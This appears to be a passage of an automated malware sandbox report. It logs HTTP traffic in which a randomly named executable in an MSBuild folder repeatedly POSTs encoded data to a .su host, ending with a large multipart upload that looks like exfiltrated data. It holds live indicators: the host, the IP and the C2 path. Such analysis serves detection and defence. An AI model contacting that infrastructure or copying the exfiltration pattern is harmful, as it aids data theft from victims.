                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 02 27 2b 3c 09 20 20 20 51 29 13 04 12 29 57 2e 13 28 06 07 1a 2a 3f 35 00 3b 39 3c 1e 2b 06 30 19 23 11 3c 50 23 21 01 0b 31 03 20 5c 05 11 27 5e 30 1c 3d 5b 26 29 29 10 33 32 2d 5f 26 06 33 41 28 02 22 59 33 29 37 5c 37 0d 28 55 32 04 34 01 24 2f 0b 5e 2d 10 33 5f 31 17 2d 54 02 17 21 08 27 13 23 00 2b 20 3b 5d 26 21 3d 58 3e 03 24 52 21 17 2c 1e 22 1d 0c 00 26 2b 3e 5e 21 54 3b 59 3f 16 0a 05 25 2c 23 0f 27 3e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-'+< Q))W.(*?5;9<+0#<P#!1 \'^0=[&))32-_&3A("Y3)7\7(U24$/^-3_1-T!'#+ ;]&!=X>$R!,"&+>^!T;Y?%,#'>#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.44974791.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:40.437248945 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:40.779300928 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:40.779640913 CET2548OUTData Raw: 54 5c 51 5e 5b 5b 50 53 5e 57 5a 51 57 5d 50 52 54 57 54 5c 56 5b 57 59 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T\Q^[[PS^WZQW]PRTWT\V[WYQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;!T$13&/&3+&9V6$V57]&742Z&[8)%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:41.148926020 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.44974991.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:44.264975071 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:44.610304117 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:44.610636950 CET2548OUTData Raw: 51 5a 54 5d 5b 5a 50 54 5e 57 5a 51 57 5b 50 58 54 56 54 52 56 58 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QZT][ZPT^WZQW[PXTVTRVXWZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:8)$0=]'_,6Y3'Y10V5'6,$$;&/&,%Z"!Q*!
                                                                                      Mar 6, 2024 09:52:44.985385895 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:44 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                      10192.168.2.44975091.227.16.1180
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:45.461106062 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:45.802882910 CET25INHTTP/1.1 100 Continue


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.44975191.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:45.811775923 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1868
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:46.155237913 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:46.155657053 CET1868OUTData Raw: 54 50 54 5c 5e 5c 55 50 5e 57 5a 51 57 5b 50 52 54 54 54 5e 56 5e 57 58 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TPT\^\UP^WZQW[PRTTT^V^WXQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/!"S'#1_$>_;Y>^&(X29,U!?4T5&77]&:;9%Z"!Q*!
                                                                                      Mar 6, 2024 09:52:46.527968884 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:46 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 11 31 3b 27 57 23 0a 3c 53 3e 2d 31 06 29 21 25 00 28 16 3d 14 3e 06 3d 04 2c 2a 2c 56 3f 5e 34 1c 20 2f 20 1a 21 22 3c 55 26 39 20 5c 05 11 24 02 24 0b 2e 02 27 04 21 5a 27 21 32 07 25 11 09 0b 2a 2b 31 03 33 07 38 05 23 0a 24 1f 26 2a 2b 5a 30 3f 36 04 2e 07 2f 1c 31 17 2d 54 02 17 21 0d 25 2e 3f 05 2b 30 23 58 26 0b 29 5c 2a 3d 3f 0f 22 07 3c 1d 36 33 25 59 25 28 36 59 21 22 23 59 3c 01 23 59 33 02 2c 53 26 04 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.1;'W#<S>-1)!%(=>=,*,V?^4 / !"<U&9 \$$.'!Z'!2%*+138#$&*+Z0?6./1-T!%.?+0#X&)\*=?"<63%Y%(6Y!"#Y<#Y3,S&#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.44975291.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:45.946743965 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:46.287347078 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:46.287606001 CET2548OUTData Raw: 51 59 54 5c 5b 56 55 57 5e 57 5a 51 57 5c 50 53 54 53 54 5d 56 5e 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYT\[VUW^WZQW\PSTST]V^W]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C;-'U=\':\/?5$(/%9+#?(W!,'7#Y%<"-)%Z"!Q*=
                                                                                      Mar 6, 2024 09:52:46.656646967 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:46 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.44975391.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:47.157840014 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:47.499793053 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:47.500258923 CET2548OUTData Raw: 54 51 51 5d 5b 57 55 53 5e 57 5a 51 57 5c 50 5e 54 50 54 58 56 59 57 59 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQQ][WUS^WZQW\P^TPTXVYWYQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:;":'U!$&9;&;#X1'5</!,0B42?9,%Z"!Q*=
                                                                                      Mar 6, 2024 09:52:47.870523930 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:47 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.44975491.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:48.380800009 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:48.723937035 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:48.724226952 CET2548OUTData Raw: 54 5f 51 5c 5b 5b 55 56 5e 57 5a 51 57 5d 50 5b 54 56 54 5b 56 5c 57 59 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_Q\[[UV^WZQW]P[TVT[V\WYQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E.!50#1$5-,*^3(':35Z?!?($47$/>\,)%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:49.095474005 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:48 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.44975591.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:49.577935934 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:49.933944941 CET2548OUTData Raw: 51 5b 51 5c 5e 5b 55 52 5e 57 5a 51 57 5e 50 58 54 51 54 5c 56 59 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[Q\^[UR^WZQW^PXTQT\VYW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E;1336-?)3Z&* !,5?^$;%<),%Z"!Q*
                                                                                      Mar 6, 2024 09:52:49.937273979 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:50.306214094 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:50 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.44975791.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:50.570000887 CET394OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----1gHbR9SeE9VTaBijzqbnE2fczWhF4BVimU
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 153534
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:50.914952040 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:50.915596008 CET12860OUTData Raw: 2d 2d 2d 2d 2d 2d 31 67 48 62 52 39 53 65 45 39 56 54 61 42 69 6a 7a 71 62 6e 45 32 66 63 7a 57 68 46 34 42 56 69 6d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                      Data Ascii: ------1gHbR9SeE9VTaBijzqbnE2fczWhF4BVimUContent-Disposition: form-data; name="0"Content-Type: text/plainTZQY[^U]^WZQWXPRTWTYV\WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S]
                                                                                      Mar 6, 2024 09:52:51.260965109 CET18004OUTData Raw: 55 53 53 52 66 64 43 75 4d 6c 6b 67 57 4a 51 47 43 42 65 4d 56 76 4f 4e 4d 43 4c 42 65 51 54 48 76 51 31 78 33 62 35 44 4f 43 53 4e 51 4b 38 61 63 54 49 78 47 59 58 43 51 6b 45 73 50 49 57 7a 4e 38 63 44 6f 64 42 35 77 32 44 77 72 73 38 61 67 67
                                                                                      Data Ascii: USSRfdCuMlkgWJQGCBeMVvONMCLBeQTHvQ1x3b5DOCSNQK8acTIxGYXCQkEsPIWzN8cDodB5w2Dwrs8agggWWGEBvpOJ15t3Y7ZtO9YtbMANL/qGnbb0ljKo1X5e1Rkpwj4KczuGhNj9Mlx7NNt999w/PoeVH18aWSYbfEPSgMxbpbUuP3pE97Irps4uvONMK5L+xFYyYRvS9pB0PClbuP6yXF71adaTobINL4O7jZGkrtUzO8n
                                                                                      Mar 6, 2024 09:52:51.261096954 CET5144OUTData Raw: 32 6a 41 6a 49 36 34 54 59 45 63 4a 4c 51 59 7a 36 44 61 6d 37 58 6d 71 52 77 53 62 33 53 51 4f 30 41 76 75 42 56 57 38 6d 51 70 39 46 54 30 55 6c 31 79 6c 41 61 5a 30 50 42 5a 57 31 34 48 34 5a 4e 72 72 73 75 71 69 65 59 5a 53 6f 65 79 5a 64 6f
                                                                                      Data Ascii: 2jAjI64TYEcJLQYz6Dam7XmqRwSb3SQO0AvuBVW8mQp9FT0Ul1ylAaZ0PBZW14H4ZNrrsuqieYZSoeyZdoHBGtL6mKhnJWzSo7zZ7+QMebORmBuB03cHCyg85t6q+73Va/rerDvS/zrhM5fv3qXsrEONAKzhNlIcezPQOYk+6cqj2UhosAGmJOZ+gm2v1BXNgaOwflVQ5fjjKfwa0nMkNAvpzhiJvsq/nj6YnLjgXAIqu3REPwK
                                                                                      Mar 6, 2024 09:52:51.303246975 CET2572OUTData Raw: 51 38 2f 73 51 2f 41 31 48 31 4a 63 51 50 78 6e 32 4b 6f 4d 46 53 42 4e 49 54 2f 56 51 78 43 6d 38 6e 46 63 47 49 63 69 73 33 44 58 34 52 4b 36 46 70 63 4d 38 54 69 74 38 46 41 52 52 47 70 72 55 46 41 72 53 46 2f 56 69 51 42 4d 72 79 45 30 65 4f
                                                                                      Data Ascii: Q8/sQ/A1H1JcQPxn2KoMFSBNIT/VQxCm8nFcGIcis3DX4RK6FpcM8Tit8FARRGprUFArSF/ViQBMryE0eOn0cPDyojpBlo/7FI4odOZ59GlX04ZJX9VMMtNWRQQPYlkG6xwz9QAoHf5JkD4mhujU5z+CwkJ/6HVISje3JDZh2S6eJSX7twfZHI6pwuwn0hqnpbbnF8G5ELnMQ8NPC+oRSEGjdq0HH6lUDKMyv5fU6g8VvUnINWo
                                                                                      Mar 6, 2024 09:52:51.606261015 CET7716OUTData Raw: 6e 78 77 49 51 67 61 46 47 65 54 66 53 66 4c 76 68 47 50 67 42 33 57 70 4c 71 4c 6d 58 2f 32 38 6f 2f 6b 65 66 50 32 68 75 70 72 67 49 68 41 56 38 56 68 4d 56 79 75 4a 73 55 37 31 55 47 70 52 33 57 57 4e 4e 47 32 6e 79 75 70 63 36 39 6f 4e 54 72
                                                                                      Data Ascii: nxwIQgaFGeTfSfLvhGPgB3WpLqLmX/28o/kefP2huprgIhAV8VhMVyuJsU71UGpR3WWNNG2nyupc69oNTrURevoJ8pnA3wOkH3jex+tlGH95nE5elidKtjtvyyPRQ2JSX1VXWzu89qKoeLTZhZ7UIsXzxhfP6LeMwmMl4JuP8hhv+1RuY+vZcje+GcXFGWtzLXw/AcwWnQS2BH5Hmhj6xnJXhFcIA3I+JtB4yeUvdkECKzrVn19
                                                                                      Mar 6, 2024 09:52:51.606801987 CET25720OUTData Raw: 39 70 46 75 49 2f 66 4c 71 79 76 67 39 30 52 55 4c 79 53 39 35 4f 62 74 49 4c 49 70 53 57 74 58 35 58 6a 58 58 65 74 7a 6f 30 63 64 76 6a 43 37 4d 4b 6c 54 2f 79 71 75 34 2b 2b 54 38 63 69 69 67 2f 30 79 75 64 47 74 49 36 70 77 56 34 35 59 31 43
                                                                                      Data Ascii: 9pFuI/fLqyvg90RULyS95ObtILIpSWtX5XjXXetzo0cdvjC7MKlT/yqu4++T8ciig/0yudGtI6pwV45Y1CZP1VOJkqlPSXCmZWiiMpsETPOyPxCwc34ws8iiWCnAk/HrTmL1xB0rXaV9DrZzZF/p21tFWx65y1xf77SXqX8QurK1z1Edd3uj+Z15+E8mXoHoN+8UZPKXPY1Rzr48GqpuywN5b42/mKbwpvTOr16MbBVSsFJZdlh
                                                                                      Mar 6, 2024 09:52:51.606923103 CET7716OUTData Raw: 79 46 37 32 4a 56 51 4d 43 64 6c 43 6a 43 56 6b 37 48 74 6b 69 7a 45 71 57 32 56 72 51 32 57 76 62 47 50 4c 6c 75 77 37 32 66 65 5a 37 7a 6b 7a 57 6a 37 50 38 33 79 66 76 33 36 76 31 2b 2f 37 42 79 39 7a 35 72 6a 50 66 65 37 37 76 71 37 72 66 65
                                                                                      Data Ascii: yF72JVQMCdlCjCVk7HtkizEqW2VrQ2WvbGPLluw72feZ7zkzWj7P83yfv36v1+/7By9z5rjPfe77vq7rfe0Jz6faHbNjM9+fCoRAZKnN8mh3Nd+ZGjSUCmfdpmRmu+kxHrvpuOGb5HgJ7UKbku320xbanado9qQ64OASSia3Uoxap7vcXZkSlgT8BsCAAfNvtVqQ9p+EL4KrUlPQgeQP55HTPww5SEyX6yQWVkbR/m5eQohdgNH
                                                                                      Mar 6, 2024 09:52:51.607238054 CET5144OUTData Raw: 47 55 65 47 77 65 30 45 6c 41 68 45 47 34 41 74 65 67 59 67 63 41 49 2b 55 6f 44 6d 73 69 4f 4d 74 78 4e 68 4e 45 54 6e 43 61 73 45 61 4e 72 53 4a 4c 42 45 7a 6e 49 51 6e 75 6e 62 68 50 49 42 41 78 6b 51 6b 72 32 4a 47 67 79 30 6c 59 77 68 44 70
                                                                                      Data Ascii: GUeGwe0ElAhEG4AtegYgcAI+UoDmsiOMtxNhNETnCasEaNrSJLBEznIQnunbhPIBAxkQkr2JGgy0lYwhDpsIJyok4OdTzEmgmhJKgdIEIFIOmLwFuk1CAG1fJV1TrpOArsKCQgFQR3IEgG4UYGs4wSgC882OBmNYQaAm/khbgADFFATpAdhEaBdzSWGG+TBCkDApzxxbYCoA9EsqQKkq1+Uz6mODnlLhIWcT4zV9DbXJqCUaWID
                                                                                      Mar 6, 2024 09:52:51.649194002 CET5144OUTData Raw: 76 45 47 4e 76 61 52 59 4b 6c 74 71 5a 4e 4a 32 66 72 72 38 58 45 4e 64 66 43 45 65 6b 6f 6d 48 6c 47 37 7a 43 50 6a 73 71 37 72 37 4f 4f 65 56 4a 7a 36 71 67 4c 50 70 68 58 58 63 39 61 46 6f 2f 76 78 47 50 36 47 5a 58 61 75 5a 2b 55 6a 51 45 74
                                                                                      Data Ascii: vEGNvaRYKltqZNJ2frr8XENdfCEekomHlG7zCPjsq7r7OOeVJz6qgLPphXXc9aFo/vxGP6GZXauZ+UjQEtRS6PqbLp7gHz9wP1UKLc4vxJU9Dk+kI7vB8aZRZjZY7toaItJbPGtzzO9586d04/MTdGkC/Hna1I0yH3qMGJB+kh6ru69Q2sVde8U49evuD+QxE7mbTsu1KbsRbvJbW7LyrrxZAUV4COLdXcq0s+Kh17wgr99nbCE
                                                                                      Mar 6, 2024 09:52:51.951430082 CET5144OUTData Raw: 69 30 69 7a 72 70 37 6f 37 7a 31 4c 52 73 73 2b 62 39 62 6f 33 4c 76 58 47 68 57 71 68 64 68 50 57 52 2f 6b 47 54 31 59 65 78 33 54 6c 4b 2f 78 79 43 62 6b 63 34 4d 65 35 75 31 53 64 2b 6d 32 2f 35 54 41 49 30 57 32 4f 59 6e 42 46 70 69 73 61 39
